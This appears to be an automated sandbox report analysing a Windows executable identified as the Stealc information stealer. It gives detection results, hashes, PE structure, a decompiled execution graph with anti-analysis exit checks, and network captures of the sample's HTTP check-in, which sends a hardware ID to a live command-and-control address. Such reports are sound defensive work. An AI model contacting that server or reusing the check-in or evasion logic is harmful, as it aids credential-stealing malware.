                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe47%ReversingLabsWin32.Trojan.Generic
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  		unknown
                  http://185.215.113.206/true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/6c4adf523b719729.php#file.exe, 00000000.00000002.1319415153.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/6c4adf523b719729.php=YVfile.exe, 00000000.00000002.1319415153.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/6c4adf523b719729.php?file.exe, 00000000.00000002.1319415153.00000000016BD000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206file.exe, 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.206/.IE5file.exe, 00000000.00000002.1319415153.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.206/2Ofile.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.206/6c4adf523b719729.phpZfile.exe, 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://185.215.113.206/wsfile.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://185.215.113.206/aOfile.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000003.1261156514.00000000052BB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.215.113.206
                                      		unknownPortugal
                                      		206894WHOLESALECONNECTIONSNLtrue

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1546042
                                      Start date and time:2024-10-31 12:17:06 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 32s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:15
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 80%
                                      • Number of executed functions: 20
                                      • Number of non-executed functions: 133
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: file.exe

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      185.215.113.206file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                      • 185.215.113.206/6c4adf523b719729.php

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                      • 185.215.113.206

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      No created / dropped files found

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.957701409174607
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:file.exe
                                      File size:2'095'104 bytes
                                      MD5:3d17618b1108053c2643a92804657456
                                      SHA1:92d6f817db761936dbe341a58edcfbdb3f778de7
                                      SHA256:06485350aa2fecbc8b68c4bf5e2e507030065fd92794425da145c74b6804c41c
                                      SHA512:d81540bb792ca8b1314772ffdac8c3d8fb604a1baf239ec925cff191edf6911aec8b00631d6f4744393df7bacb37d1c69e4336c2d90fe95218b8a88421a46d32
                                      SSDEEP:49152:mwH4Nl8k3voLs1IXdeAE9TqIR1v99BUw3r7J8eJ1:mwarQLXtejwIP9UwPOeJ
                                      TLSH:C3A5336D9B392FF8C6CC0972DEEB9D55B2ED09898481001B9244D1FCE383D9BB5E605E
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                                      File Icon

                                      Icon Hash:00928e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0xb14000
                                      Entrypoint Section:.taggant
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                      Entrypoint Preview

                                      Instruction
                                      jmp 00007FC41C52991Ah

                                      Rich Headers

                                      Programming Language:
                                      • [C++] VS2010 build 30319
                                      • [ASM] VS2010 build 30319
                                      • [ C ] VS2010 build 30319
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [LNK] VS2010 build 30319

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      0x10000x2e70000x67600bee5e8624cdc148e9c1d03408cee4711unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      0x2ea0000x2940000x200ed9ebf47f1cd5628e8f696b6328eb381unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      lolfhxxi0x57e0000x1950000x1946000a633e3f5a6348ebbee67e741df9b45dFalse0.994913422527048data7.954139609313276IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      swlqukzj0x7130000x10000x600f0d3fc564744a5124e113a49c2cd136bFalse0.5677083333333334data4.94972615643025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .taggant0x7140000x30000x2200d19411689211f4d5ddf280d926226dd9False0.06192555147058824DOS executable (COM)0.7138032536749443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                      Imports

                                      DLLImport
                                      kernel32.dlllstrcpy

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-10-31T12:18:08.346910+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749702185.215.113.20680TCP
                                      2024-10-31T12:18:21.407485+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.749744TCP
                                      2024-10-31T12:18:59.653745+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.749952TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 31, 2024 12:18:06.956082106 CET4970280192.168.2.7185.215.113.206
                                      Oct 31, 2024 12:18:07.136071920 CET8049702185.215.113.206192.168.2.7
                                      Oct 31, 2024 12:18:07.136231899 CET4970280192.168.2.7185.215.113.206
                                      Oct 31, 2024 12:18:07.137228012 CET4970280192.168.2.7185.215.113.206
                                      Oct 31, 2024 12:18:07.142072916 CET8049702185.215.113.206192.168.2.7
                                      Oct 31, 2024 12:18:08.054258108 CET8049702185.215.113.206192.168.2.7
                                      Oct 31, 2024 12:18:08.054369926 CET4970280192.168.2.7185.215.113.206
                                      Oct 31, 2024 12:18:08.057276011 CET4970280192.168.2.7185.215.113.206
                                      Oct 31, 2024 12:18:08.062099934 CET8049702185.215.113.206192.168.2.7
                                      Oct 31, 2024 12:18:08.346822023 CET8049702185.215.113.206192.168.2.7
                                      Oct 31, 2024 12:18:08.346910000 CET4970280192.168.2.7185.215.113.206
                                      Oct 31, 2024 12:18:11.828041077 CET4970280192.168.2.7185.215.113.206

                                      HTTP Request Dependency Graph

                                      • 185.215.113.206

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.749702185.215.113.206805456C:\Users\user\Desktop\file.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 31, 2024 12:18:07.137228012 CET90OUTGET / HTTP/1.1
                                      Host: 185.215.113.206
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Oct 31, 2024 12:18:08.054258108 CET203INHTTP/1.1 200 OK
                                      Date: Thu, 31 Oct 2024 11:18:07 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Content-Length: 0
                                      Keep-Alive: timeout=5, max=100
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=UTF-8
                                      Oct 31, 2024 12:18:08.057276011 CET413OUTPOST /6c4adf523b719729.php HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBF
                                      Host: 185.215.113.206
                                      Content-Length: 211
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 38 36 35 35 44 37 31 46 45 43 32 32 37 33 38 34 38 33 30 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 2d 2d 0d 0a
                                      Data Ascii: ------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="hwid"698655D71FEC2273848308------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="build"tale------EBAAAFBGDBKKEBGCFCBF--
                                      Oct 31, 2024 12:18:08.346822023 CET210INHTTP/1.1 200 OK
                                      Date: Thu, 31 Oct 2024 11:18:08 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Content-Length: 8
                                      Keep-Alive: timeout=5, max=99
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                      Data Ascii: YmxvY2s=


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:07:18:01
                                      Start date:31/10/2024
                                      Path:C:\Users\user\Desktop\file.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                      Imagebase:0x7b0000
                                      File size:2'095'104 bytes
                                      MD5 hash:3D17618B1108053C2643A92804657456
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1261156514.0000000005290000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:3.1%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:2.9%
                                        Total number of Nodes:1329
                                        Total number of Limit Nodes:24
                                        execution_graph 37340 a9efb2 37341 a9f046 VirtualAlloc 37340->37341 37342 7c6c90 37387 7b22a0 37342->37387 37366 7c6d04 37367 7cacc0 4 API calls 37366->37367 37368 7c6d0b 37367->37368 37369 7cacc0 4 API calls 37368->37369 37370 7c6d12 37369->37370 37371 7cacc0 4 API calls 37370->37371 37372 7c6d19 37371->37372 37373 7cacc0 4 API calls 37372->37373 37374 7c6d20 37373->37374 37539 7cabb0 37374->37539 37376 7c6dac 37543 7c6bc0 GetSystemTime 37376->37543 37377 7c6d29 37377->37376 37379 7c6d62 OpenEventA 37377->37379 37381 7c6d79 37379->37381 37382 7c6d95 CloseHandle Sleep 37379->37382 37386 7c6d81 CreateEventA 37381->37386 37384 7c6daa 37382->37384 37384->37377 37385 7c6db6 CloseHandle ExitProcess 37386->37376 37740 7b4610 37387->37740 37389 7b22b4 37390 7b4610 2 API calls 37389->37390 37391 7b22cd 37390->37391 37392 7b4610 2 API calls 37391->37392 37393 7b22e6 37392->37393 37394 7b4610 2 API calls 37393->37394 37395 7b22ff 37394->37395 37396 7b4610 2 API calls 37395->37396 37397 7b2318 37396->37397 37398 7b4610 2 API calls 37397->37398 37399 7b2331 37398->37399 37400 7b4610 2 API calls 37399->37400 37401 7b234a 37400->37401 37402 7b4610 2 API calls 37401->37402 37403 7b2363 37402->37403 37404 7b4610 2 API calls 37403->37404 37405 7b237c 37404->37405 37406 7b4610 2 API calls 37405->37406 37407 7b2395 37406->37407 37408 7b4610 2 API calls 37407->37408 37409 7b23ae 37408->37409 37410 7b4610 2 API calls 37409->37410 37411 7b23c7 37410->37411 37412 7b4610 2 API calls 37411->37412 37413 7b23e0 37412->37413 37414 7b4610 2 API calls 37413->37414 37415 7b23f9 37414->37415 37416 7b4610 2 API calls 37415->37416 37417 7b2412 37416->37417 37418 7b4610 2 API calls 37417->37418 37419 7b242b 37418->37419 37420 7b4610 2 API calls 37419->37420 37421 7b2444 37420->37421 37422 7b4610 2 API calls 37421->37422 37423 7b245d 37422->37423 37424 7b4610 2 API calls 37423->37424 37425 7b2476 37424->37425 37426 7b4610 2 API calls 37425->37426 37427 7b248f 37426->37427 37428 7b4610 2 API calls 37427->37428 37429 7b24a8 37428->37429 37430 7b4610 2 API calls 37429->37430 37431 7b24c1 37430->37431 37432 7b4610 2 API calls 37431->37432 37433 7b24da 37432->37433 37434 7b4610 2 API calls 37433->37434 37435 7b24f3 37434->37435 37436 7b4610 2 API calls 37435->37436 37437 7b250c 37436->37437 37438 7b4610 2 API calls 37437->37438 37439 7b2525 37438->37439 37440 7b4610 2 API calls 37439->37440 37441 7b253e 37440->37441 37442 7b4610 2 API calls 37441->37442 37443 7b2557 37442->37443 37444 7b4610 2 API calls 37443->37444 37445 7b2570 37444->37445 37446 7b4610 2 API calls 37445->37446 37447 7b2589 37446->37447 37448 7b4610 2 API calls 37447->37448 37449 7b25a2 37448->37449 37450 7b4610 2 API calls 37449->37450 37451 7b25bb 37450->37451 37452 7b4610 2 API calls 37451->37452 37453 7b25d4 37452->37453 37454 7b4610 2 API calls 37453->37454 37455 7b25ed 37454->37455 37456 7b4610 2 API calls 37455->37456 37457 7b2606 37456->37457 37458 7b4610 2 API calls 37457->37458 37459 7b261f 37458->37459 37460 7b4610 2 API calls 37459->37460 37461 7b2638 37460->37461 37462 7b4610 2 API calls 37461->37462 37463 7b2651 37462->37463 37464 7b4610 2 API calls 37463->37464 37465 7b266a 37464->37465 37466 7b4610 2 API calls 37465->37466 37467 7b2683 37466->37467 37468 7b4610 2 API calls 37467->37468 37469 7b269c 37468->37469 37470 7b4610 2 API calls 37469->37470 37471 7b26b5 37470->37471 37472 7b4610 2 API calls 37471->37472 37473 7b26ce 37472->37473 37474 7c9bb0 37473->37474 37745 7c9aa0 GetPEB 37474->37745 37476 7c9bb8 37477 7c9bca 37476->37477 37478 7c9de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 37476->37478 37481 7c9bdc 21 API calls 37477->37481 37479 7c9e5d 37478->37479 37480 7c9e44 GetProcAddress 37478->37480 37482 7c9e96 37479->37482 37483 7c9e66 GetProcAddress GetProcAddress 37479->37483 37480->37479 37481->37478 37484 7c9e9f GetProcAddress 37482->37484 37485 7c9eb8 37482->37485 37483->37482 37484->37485 37486 7c9ed9 37485->37486 37487 7c9ec1 GetProcAddress 37485->37487 37488 7c6ca0 37486->37488 37489 7c9ee2 GetProcAddress GetProcAddress 37486->37489 37487->37486 37490 7caa50 37488->37490 37489->37488 37491 7caa60 37490->37491 37492 7c6cad 37491->37492 37493 7caa8e lstrcpy 37491->37493 37494 7b11d0 37492->37494 37493->37492 37495 7b11e8 37494->37495 37496 7b120f ExitProcess 37495->37496 37497 7b1217 37495->37497 37498 7b1160 GetSystemInfo 37497->37498 37499 7b117c ExitProcess 37498->37499 37500 7b1184 37498->37500 37501 7b1110 GetCurrentProcess VirtualAllocExNuma 37500->37501 37502 7b1149 37501->37502 37503 7b1141 ExitProcess 37501->37503 37746 7b10a0 VirtualAlloc 37502->37746 37506 7b1220 37750 7c8b40 37506->37750 37509 7b1249 __aulldiv 37510 7b129a 37509->37510 37511 7b1292 ExitProcess 37509->37511 37512 7c6a10 GetUserDefaultLangID 37510->37512 37513 7c6a32 37512->37513 37514 7c6a73 37512->37514 37513->37514 37515 7c6a4d ExitProcess 37513->37515 37516 7c6a6b ExitProcess 37513->37516 37517 7c6a57 ExitProcess 37513->37517 37518 7c6a61 ExitProcess 37513->37518 37519 7c6a43 ExitProcess 37513->37519 37520 7b1190 37514->37520 37516->37514 37521 7c7a70 3 API calls 37520->37521 37522 7b119e 37521->37522 37523 7b11cc 37522->37523 37524 7c79e0 3 API calls 37522->37524 37527 7c79e0 GetProcessHeap RtlAllocateHeap GetUserNameA 37523->37527 37525 7b11b7 37524->37525 37525->37523 37526 7b11c4 ExitProcess 37525->37526 37528 7c6cd0 37527->37528 37529 7c7a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 37528->37529 37530 7c6ce3 37529->37530 37531 7cacc0 37530->37531 37752 7caa20 37531->37752 37533 7cacd1 lstrlen 37535 7cacf0 37533->37535 37534 7cad28 37753 7caab0 37534->37753 37535->37534 37537 7cad0a lstrcpy lstrcat 37535->37537 37537->37534 37538 7cad34 37538->37366 37540 7cabcb 37539->37540 37541 7cac1b 37540->37541 37542 7cac09 lstrcpy 37540->37542 37541->37377 37542->37541 37757 7c6ac0 37543->37757 37545 7c6c2e 37546 7c6c38 sscanf 37545->37546 37786 7cab10 37546->37786 37548 7c6c4a SystemTimeToFileTime SystemTimeToFileTime 37549 7c6c6e 37548->37549 37550 7c6c80 37548->37550 37549->37550 37551 7c6c78 ExitProcess 37549->37551 37552 7c5d60 37550->37552 37553 7c5d6d 37552->37553 37554 7caa50 lstrcpy 37553->37554 37555 7c5d7e 37554->37555 37788 7cab30 lstrlen 37555->37788 37558 7cab30 2 API calls 37559 7c5db4 37558->37559 37560 7cab30 2 API calls 37559->37560 37561 7c5dc4 37560->37561 37792 7c6680 37561->37792 37564 7cab30 2 API calls 37565 7c5de3 37564->37565 37566 7cab30 2 API calls 37565->37566 37567 7c5df0 37566->37567 37568 7cab30 2 API calls 37567->37568 37569 7c5dfd 37568->37569 37570 7cab30 2 API calls 37569->37570 37571 7c5e49 37570->37571 37801 7b26f0 37571->37801 37579 7c5f13 37580 7c6680 lstrcpy 37579->37580 37581 7c5f25 37580->37581 37582 7caab0 lstrcpy 37581->37582 37583 7c5f42 37582->37583 37584 7cacc0 4 API calls 37583->37584 37585 7c5f5a 37584->37585 37586 7cabb0 lstrcpy 37585->37586 37587 7c5f66 37586->37587 37588 7cacc0 4 API calls 37587->37588 37589 7c5f8a 37588->37589 37590 7cabb0 lstrcpy 37589->37590 37591 7c5f96 37590->37591 37592 7cacc0 4 API calls 37591->37592 37593 7c5fba 37592->37593 37594 7cabb0 lstrcpy 37593->37594 37595 7c5fc6 37594->37595 37596 7caa50 lstrcpy 37595->37596 37597 7c5fee 37596->37597 38527 7c7690 GetWindowsDirectoryA 37597->38527 37600 7caab0 lstrcpy 37601 7c6008 37600->37601 38537 7b48d0 37601->38537 37603 7c600e 38682 7c19f0 37603->38682 37605 7c6016 37606 7caa50 lstrcpy 37605->37606 37607 7c6039 37606->37607 37608 7b1590 lstrcpy 37607->37608 37609 7c604d 37608->37609 38698 7b59b0 34 API calls codecvt 37609->38698 37611 7c6053 38699 7c1280 lstrlen lstrcpy 37611->38699 37613 7c605e 37614 7caa50 lstrcpy 37613->37614 37615 7c6082 37614->37615 37616 7b1590 lstrcpy 37615->37616 37617 7c6096 37616->37617 38700 7b59b0 34 API calls codecvt 37617->38700 37619 7c609c 38701 7c0fc0 